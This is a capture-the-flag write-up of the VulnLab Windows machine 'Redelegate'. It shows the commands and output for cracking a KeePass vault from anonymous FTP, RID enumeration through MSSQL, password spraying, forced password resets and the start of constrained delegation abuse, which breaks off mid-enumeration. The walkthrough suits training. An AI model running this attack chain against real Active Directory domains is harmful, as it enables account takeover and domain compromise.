POSTS

VULNLAB: Redelegate

Redelegate is a hard-difficultly Windows machine that starts with Anonymous FTP access, which allows the attacker to download sensitive Keepass Database files. The attacker then discovers that the credentials in the database are valid for MSSQL local login, which leads to enumerate SIDs and performs a password spray attack. Being a member of the HelpDesk group, the newly compromised user account Marie.Curie has a User-Force-Change-Password Access Control setup over the Helen.Frost user account; that user account has privileges to get a PS remoting session onto the Domain Controller. The Helen.Frost user account also has the SeEnableDelegationPrivilege assigned and has full control over the FS01$ machine account, essentially allowing the attacker account to modify the msDS-AllowedToDelegateTo LDAP attribute and change the password of a computer object and perform a Constrained Delegation attack.

VULNLAB: Redelegate
4101 words · 20 min

Overview

  • Type Machines
  • OS Windows
  • Severity Hard
  • Creator Geiseric
  • Release date 2024 Nov 22

Enumeration

Start the instance via Discord and let’s go:

image

10.10.86.64

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.86.64

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24  12:11AM                  434 CyberAudit.txt
| 10-20-24  04:14AM                 2622 Shared.kdbx
|_10-20-24  12:26AM                  580 TrainingAgenda.txt
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-25 11:26:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-25T10:54:03
|_Not valid after:  2054-11-25T10:54:03
| ms-sql-ntlm-info: 
|   10.10.86.64:1433: 
|     Target_Name: REDELEGATE
|     NetBIOS_Domain_Name: REDELEGATE
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: redelegate.vl
|     DNS_Computer_Name: dc.redelegate.vl
|     DNS_Tree_Name: redelegate.vl
|_    Product_Version: 10.0.20348
|_ssl-date: 2024-11-25T11:27:44+00:00; -1s from scanner time.
| ms-sql-info: 
|   10.10.86.64:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-11-25T11:27:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2024-10-30T13:31:09
|_Not valid after:  2025-05-01T13:31:09
| rdp-ntlm-info: 
|   Target_Name: REDELEGATE
|   NetBIOS_Domain_Name: REDELEGATE
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: redelegate.vl
|   DNS_Computer_Name: dc.redelegate.vl
|   DNS_Tree_Name: redelegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-11-25T11:27:33+00:00
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49647/tcp open  msrpc         Microsoft Windows RPC
49659/tcp open  msrpc         Microsoft Windows RPC
49661/tcp open  msrpc         Microsoft Windows RPC
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49932/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info: 
|   10.10.102.76:49932: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 49932
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-25T10:54:03
|_Not valid after:  2054-11-25T10:54:03
|_ssl-date: 2024-11-25T11:27:44+00:00; -1s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.86.64:49932: 
|     Target_Name: REDELEGATE
|     NetBIOS_Domain_Name: REDELEGATE
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: redelegate.vl
|     DNS_Computer_Name: dc.redelegate.vl
|     DNS_Tree_Name: redelegate.vl
|_    Product_Version: 10.0.20348
63299/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-11-25T11:27:35
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.63 seconds
  • Add dc.redelegate.vl, redelegate.vl in in /etc/hosts

FTP enumeration (21/tcp)

We saw some interesting file in the nmap output then let’s dowload all of them:

$ ftp -i anonymous@dc.redelegate.vl
Connected to dc.redelegate.vl.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: test@test.com
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||51139|)
125 Data connection already open; Transfer starting.
10-20-24  12:11AM                  434 CyberAudit.txt
10-20-24  04:14AM                 2622 Shared.kdbx
10-20-24  12:26AM                  580 TrainingAgenda.txt
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget *
local: CyberAudit.txt remote: CyberAudit.txt
229 Entering Extended Passive Mode (|||58326|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************|   434        1.54 KiB/s    00:00 ETA
226 Transfer complete.
434 bytes received in 00:00 (1.54 KiB/s)
local: Shared.kdbx remote: Shared.kdbx
229 Entering Extended Passive Mode (|||58327|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************|  2622        9.36 KiB/s    00:00 ETA
226 Transfer complete.
2622 bytes received in 00:00 (9.35 KiB/s)
local: TrainingAgenda.txt remote: TrainingAgenda.txt
229 Entering Extended Passive Mode (|||58331|)
125 Data connection already open; Transfer starting.
100% |*************************************************************************************************************|   580        2.06 KiB/s    00:00 ETA
226 Transfer complete.
580 bytes received in 00:00 (2.06 KiB/s)
ftp> quit
221 Goodbye.
$ cat CyberAudit.txt                                  
OCTOBER 2024 AUDIT FINDINGS

[!] CyberSecurity Audit findings:

1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs

[*] Remediation steps:

1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS

Seems security checks for some weak/dangerous AD objects and ACLs are not yet completed then maybe possible to exploit them to grant privilege.

$ cat TrainingAgenda.txt 
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)

Friday 4th October  | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one


Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?


Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password 


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them                                                                                                                                            ```              

> Interesting awareness schedule and some people are using weak passwords like the `SeasonYear!` format so we can create a list based on this format then try brute-force attack

```sh
$ file Shared.kdbx 
Shared.kdbx: Keepass password database 2.x KDBX

Found a Keepass vault

Keepass vault cracking

Try to crack the Keepass vault using our custom password list following the previous hint SeasonYear! and simplify the SecList version based on seasons:

$ cat weak_passwords.txt 
Spring2024!
Summer2024!
Autumn2024!
Winter2024!
Fall2024!
$ keepass2john Shared.kdbx | tee shared.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca

OR

$ keepass2john Shared.kdbx > shared.hash
$ cat shared.hash
Shared:$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca
  1. Using JohnTheRipper:
$ john shared.hash -w=weak_passwords.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024!        (Shared)     
1g 0:00:00:00 DONE (2024-11-26 14:51) 4.545g/s 22.72p/s 22.72c/s 22.72C/s Spring2024!..Fall2024!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
  1. Using Hashcat:

We need to edit the hash to sanitize (remove data before $keepass$):

$ cat shared.hashcat           
$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca

Let’s crack it:

$ hashcat -a 0 -w 4 -m 13400 shared.hashcat weak_passwords.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-skylake-avx512-AMD Ryzen 9 8945HS w/ Radeon 780M Graphics, 2899/5862 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: weak_passwords.txt
* Passwords.: 5
* Bytes.....: 58
* Keyspace..: 5
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.           

$keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8a988f39baca623dd86beaee651025662e6*e4f9d51a5df3e5f9ca1019cd57e10d60f85f48228da3f3b4cf1ffee940e20e01*18c45dbbf7d365a13d6714059937ebad*a59af7b75908d7bdf68b6fd929d315ae6bfe77262e53c209869a236da830495f*806f9dd2081c364e66a114ce3adeba60b282fc5e5ee6f324114d38de9b4502ca:Fall2024!
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*600000*0*ce7395f413946b0cd279501e510cf8...4502ca
Time.Started.....: Tue Nov 26 14:51:19 2024 (0 secs)
Time.Estimated...: Tue Nov 26 14:51:19 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (weak_passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       25 H/s (0.24ms) @ Accel:512 Loops:1024 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:599040-600000
Candidate.Engine.: Device Generator
Candidates.#1....: Spring2024! -> Fall2024!
Hardware.Mon.#1..: Util: 46%

Started: Tue Nov 26 14:51:18 2024
Stopped: Tue Nov 26 14:51:20 2024

Found the keepass vault password: Fall2024!

Open the vault using KeepassXC UI:

image

image

image

Or using the KeepassXC CLI:

$ keepassxc-cli export  Shared.kdbx --format csv | awk -F',' '{print $3 ":" $4}' | sed 's/"//g' 
Enter password to unlock Shared.kdbx: 
KdbxXmlReader::readDatabase: found 1 invalid group reference(s)
Username:Password
FTPUser:SguPZBKdRyxWzvXRWy6U
Administrator:Spdv41gg4BlBgSYIW1gF
WordPress Panel:cn4KOEgsHqvKXPjEnSD9
SQLGuest:zDPBpaF4FywlqIv11vii
:22331144
Timesheet:hMFS4I0Kj8Rcd62vqi5X
Payroll:cVkqz4bCM7kJRSNlgx2G

Summary:

  • Shared → Finance
Payrol AppUser name	Payroll
Password	cVkqz4bCM7kJRSNlgx2G
	
Timesheet ManagerUser name	Timesheet
Password	hMFS4I0Kj8Rcd62vqi5X
  • Shared → HelpDesk
KeyFob CombinationPassword	22331144
  • Shared → IT
FS01 AdminUser name	Administrator
Password	Spdv41gg4BlBgSYIW1gF
	
FTPUser name	FTPUser
Password	SguPZBKdRyxWzvXRWy6U
Notes	Deprecated
	
SQL Guest AccessUser name	SQLGuest
Password	zDPBpaF4FywlqIv11vii
	
WEB01User name	WordPress Panel
Password	cn4KOEgsHqvKXPjEnSD9

MSSQL enumeration (1433/tcp)

As we found SQLGuest:zDPBpaF4FywlqIv11vii and we known that MSSQL is open on the DC so let’s dig into:

$ impacket-mssqlclient sqlguest:'zDPBpaF4FywlqIv11vii'@dc.redelegate.vl                          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SQLGuest  guest@master)> 

We tried to use xp_dirtree to get the hash of the service account running the service, but in this case it won’t help as not possible to crack it.

We can also brute forced RIDs to enumerate Domain users.

  1. Automatically using Metasploit mssql auxiliary modules mssql_enum_domain_accounts:
$ msfconsole -qx "use auxiliary/admin/mssql/mssql_enum_domain_accounts; set RHOST dc.redelegate.vl; set RPORT 1433; set TDSENCRYPTION true; set USERNAME sqlguest; set PASSWORD zDPBpaF4FywlqIv11vii; exploit -j" 
RHOST => dc.redelegate.vl
RPORT => 1433
[!] Unknown datastore option: TDSENCRYPTION.
TDSENCRYPTION => true
USERNAME => sqlguest
PASSWORD => zDPBpaF4FywlqIv11vii
[*] Running module against 10.10.110.185
[*] 10.10.110.185:1433 - Attempting to connect to the database server at 10.10.110.185:1433 as sqlguest...
[+] 10.10.110.185:1433 - Connected.
[*] 10.10.110.185:1433 - SQL Server Name: WIN-Q13O908QBPG
[*] 10.10.110.185:1433 - Domain Name: REDELEGATE
[+] 10.10.110.185:1433 - Found the domain sid: 010500000000000515000000a185deefb22433798d8e847a
[*] 10.10.110.185:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.10.110.185:1433 -  - WIN-Q13O908QBPG\Administrator
[*] 10.10.110.185:1433 -  - REDELEGATE\Guest
[*] 10.10.110.185:1433 -  - REDELEGATE\krbtgt
[*] 10.10.110.185:1433 -  - REDELEGATE\Domain Admins
[*] 10.10.110.185:1433 -  - REDELEGATE\Domain Users
[*] 10.10.110.185:1433 -  - REDELEGATE\Domain Guests
[*] 10.10.110.185:1433 -  - REDELEGATE\Domain Computers
[*] 10.10.110.185:1433 -  - REDELEGATE\Domain Controllers
[*] 10.10.110.185:1433 -  - REDELEGATE\Cert Publishers
[*] 10.10.110.185:1433 -  - REDELEGATE\Schema Admins
[*] 10.10.110.185:1433 -  - REDELEGATE\Enterprise Admins
[*] 10.10.110.185:1433 -  - REDELEGATE\Group Policy Creator Owners
[*] 10.10.110.185:1433 -  - REDELEGATE\Read-only Domain Controllers
[*] 10.10.110.185:1433 -  - REDELEGATE\Cloneable Domain Controllers
[*] 10.10.110.185:1433 -  - REDELEGATE\Protected Users
[*] 10.10.110.185:1433 -  - REDELEGATE\Key Admins
[*] 10.10.110.185:1433 -  - REDELEGATE\Enterprise Key Admins
[*] 10.10.110.185:1433 -  - REDELEGATE\RAS and IAS Servers
[*] 10.10.110.185:1433 -  - REDELEGATE\Allowed RODC Password Replication Group
[*] 10.10.110.185:1433 -  - REDELEGATE\Denied RODC Password Replication Group
[*] 10.10.110.185:1433 -  - REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
[*] 10.10.110.185:1433 -  - REDELEGATE\DC$
[*] 10.10.110.185:1433 -  - REDELEGATE\FS01$
[*] 10.10.110.185:1433 -  - REDELEGATE\Christine.Flanders
[*] 10.10.110.185:1433 -  - REDELEGATE\Marie.Curie
[*] 10.10.110.185:1433 -  - REDELEGATE\Helen.Frost
[*] 10.10.110.185:1433 -  - REDELEGATE\Michael.Pontiac
[*] 10.10.110.185:1433 -  - REDELEGATE\Mallory.Roberts
[*] 10.10.110.185:1433 -  - REDELEGATE\James.Dinkleberg
[*] 10.10.110.185:1433 -  - REDELEGATE\Helpdesk
[*] 10.10.110.185:1433 -  - REDELEGATE\IT
[*] 10.10.110.185:1433 -  - REDELEGATE\Finance
[*] 10.10.110.185:1433 -  - REDELEGATE\DnsAdmins
[*] 10.10.110.185:1433 -  - REDELEGATE\DnsUpdateProxy
[*] 10.10.110.185:1433 -  - REDELEGATE\Ryan.Cooper
[*] 10.10.110.185:1433 -  - REDELEGATE\sql_svc
  1. Manually following netspi - SQL server enumerating Domain accounts:

Get the domain name:

SQL (SQLGuest  guest@master)> SELECT DEFAULT_DOMAIN();
             
----------   
REDELEGATE   

Get the Domain SID by querying one of the default groups for it (the first 48 bytes will be the domain SID):

Note
  • We get the full RID (in HEX) then we will convert to a String and extract the domain SID by taking the first 48 bytes.
  • SID stands for Security Identifier.
  • RID stands for Relative Identifier.
  • Microsoft - Understand security identifiers
SQL (SQLGuest  guest@master)> SELECT SUSER_SID('REDELEGATE\Domain Admins')
                                                              
-----------------------------------------------------------   
b'010500000000000515000000a185deefb22433798d8e847a00020000'  
  1. Using Powershell to convert from HEX to SID:
PS C:\Users\XXXXX\Redelegate> type .\convertRID2SID.ps1
$BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
    $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\Users\XXXXX\Redelegate> .\convertHEX2SID.ps1
S-1-5-21-4024337825-2033394866-2055507597-512
  1. Using Python to convert from HEX to SID:
$ cat convertHEX2SID.py
#!/usr/bin/python3
def hex_sid_to_string_sid(hex_sid):
    sid_bytes = bytes.fromhex(hex_sid[2:])
    revision = sid_bytes[0]
    sub_auth_count = sid_bytes[1]
    identifier_authority = int.from_bytes(sid_bytes[2:8], byteorder='big')
    sub_authorities = [
        int.from_bytes(sid_bytes[8 + (i * 4):12 + (i * 4)], byteorder='little')
        for i in range(sub_auth_count)
    ]
    string_sid = f"S-{revision}-{identifier_authority}"
    for sub_auth in sub_authorities:
        string_sid += f"-{sub_auth}"
    return string_sid

hex_sid = "0x010500000000000515000000a185deefb22433798d8e847a00020000"
sid = hex_sid_to_string_sid(hex_sid)
print(sid)
$ python3 convertHEX2SID.py 
S-1-5-21-4024337825-2033394866-2055507597-512

We can now enumerate users by appending something different on the part that identifies the user (here 512).

For example with a quick bash loop:

$ cat Domain_Users_enum.sh                            
#!/bin/bash

USERNAME="sqlguest"
PASSWORD="zDPBpaF4FywlqIv11vii"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"

for SID in {1100..1200}; do
    QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
    echo "$QUERY" > query.sql
    impacket-mssqlclient "$USERNAME:$PASSWORD@$SERVER" -file query.sql  | grep -a REDELEGATE
    rm query.sql
done
$ bash Domain_Users_enum.sh
REDELEGATE\FS01$   
REDELEGATE\Christine.Flanders   
REDELEGATE\Marie.Curie   
REDELEGATE\Helen.Frost   
REDELEGATE\Michael.Pontiac   
REDELEGATE\Mallory.Roberts   
REDELEGATE\James.Dinkleberg   
REDELEGATE\Helpdesk   
REDELEGATE\IT   
REDELEGATE\Finance   
REDELEGATE\DnsAdmins   
REDELEGATE\DnsUpdateProxy   
REDELEGATE\Ryan.Cooper   
REDELEGATE\sql_svc   
^C

Foothold - User

Password spraying

As we got users and passwords then we will use them for password spraying to find authenticated users in the redelegate.vl domain:

$ cat users.txt    
Administrator
Christine.Flanders   
Marie.Curie   
Helen.Frost   
Michael.Pontiac   
Mallory.Roberts   
James.Dinkleberg   
Ryan.Cooper   
sql_svc  
$ cat passwords.txt     
Spring2024!
Summer2024!
Autumn2024!
Winter2024!
Fall2024!
cVkqz4bCM7kJRSNlgx2G
hMFS4I0Kj8Rcd62vqi5X
22331144
Spdv41gg4BlBgSYIW1gF
SguPZBKdRyxWzvXRWy6U
zDPBpaF4FywlqIv11vii
cn4KOEgsHqvKXPjEnSD9
$ nxc smb dc.redelegate.vl -u users.txt -p passwords.txt --continue-on-success
SMB         10.10.86.64     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.86.64     445    DC               [-] redelegate.vl\Administrator:Spring2024! STATUS_LOGON_FAILURE 
SMB         10.10.86.64     445    DC               [-] redelegate.vl\Christine.Flanders:Spring2024! STATUS_LOGON_FAILURE 
SMB         10.10.86.64     445    DC               [-] redelegate.vl\Marie.Curie:Spring2024! STATUS_LOGON_FAILURE 
SMB         10.10.86.64     445    DC               [-] redelegate.vl\Helen.Frost:Spring2024! STATUS_LOGON_FAILURE 
SMB         10.10.86.64     445    DC               [-] redelegate.vl\Michael.Pontiac:Spring2024! STATUS_LOGON_FAILURE 
SMB         10.10.86.64     445    DC               [-] redelegate.vl\Mallory.Roberts:Spring2024! STATUS_ACCOUNT_RESTRICTION 
...
SMB         10.10.86.64     445    DC               [+] redelegate.vl\Marie.Curie:Fall2024!
...
  • Mallory.Roberts is under account restriction
  • Found Marie.Curie:Fall2024!

AD enumerating (Redelegate_User)

$ nxc ldap dc.redelegate.vl -u marie.curie -p 'Fall2024!' --bloodhound -c all --dns-server 10.10.86.64
SMB         10.10.86.64     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
LDAP        10.10.86.64     389    DC               [+] redelegate.vl\marie.curie:Fall2024! 
LDAP        10.10.86.64     389    DC               Resolved collection methods: dcom, session, acl, rdp, group, psremote, container, trusts, objectprops, localadmin
LDAP        10.10.86.64     389    DC               Done in 00M 53S
LDAP        10.10.86.64     389    DC               Compressing output into /home/user/.nxc/logs/DC_10.10.86.64_2024-11-26_165626_bloodhound.zip

Ingest to BloodHound then let’s go to analyze:

Screenshot From 2024-11-26 17-17-18

image

Marie.Curie is a member of the Helpdesk group, means she has the ForceChangePassword permission on the user Helen.Frost.

Let’s go to change the Helen’s password:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'marie.curie' -p 'Fall2024!' set password 'helen.frost' 'Azerty1234!'
[+] Password changed successfully!

image

image

Helen.Frost is a member of the Remote Management Users group, means she has the CanPSRemote permission to the DC.

BH Summary:

image

Then let’s connect to the DC and get the user flag Redelegate_User:

$ evil-winrm -i dc.redelegate.vl -u helen.frost -p 'Azerty1234!'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> ls ..\desktop


    Directory: C:\Users\Helen.Frost\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   9:05 AM             36 user.txt


*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> type ..\desktop\user.txt
VL{036daaf2f72c183cc4ec89824b40f076}

During our BH analysis, we saw also that ryan.cooper is a Domain Admin:

image

Privilege escalating

We saw in BH that Helen.Frost is a member of the IT group, means she has the GenericAll permission to the computer FS01$:

image

Check her privileges:

*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

She has SeEnableDelegationPrivilege, that means she can enable delegation privileges on the redelegate.vl domain.

Constrained Delegation abusing (Redelegate_Root)

There are 3 types of delegation:

  • Unconstrained delegations (KUD): a service can impersonate users on any other service.
  • Constrained delegations (KCD): a service can impersonate users on a set of services
  • Resource based constrained delegations (RBCD) : a set of services can impersonate users on a service

We will focus on Constrained Delegation because:

  • not require a new DNS entry (needed for Unconstrained delegations).
  • require control of a machine account (we saw that helen.frost can control FS01$.

Firstly, we reset the password of that computer object FS01$:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' set password 'fs01$' 'Azerty1234!'
[+] Password changed successfully!

Now we control FS01$

Secondly, Additionally, we need to use our SeEnableDelegationPrivilege to make the following required changes:

  1. Using Cravate Rouge’s bloodyAD:

Check the FS01$ object:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u 'helen.frost' -p 'Azerty1234!' get object 'CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL'

distinguishedName: CN=FS01,CN=Computers,DC=redelegate,DC=vl
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 2024-10-20 13:58:06.417616+00:00
cn: FS01
dSCorePropagationData: 2024-10-20 14:06:31+00:00
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2024-10-20 14:14:03.559976+00:00
lastLogonTimestamp: 2024-10-20 14:08:36.745062+00:00
logonCount: 4
logonHours: ////////////////////////////
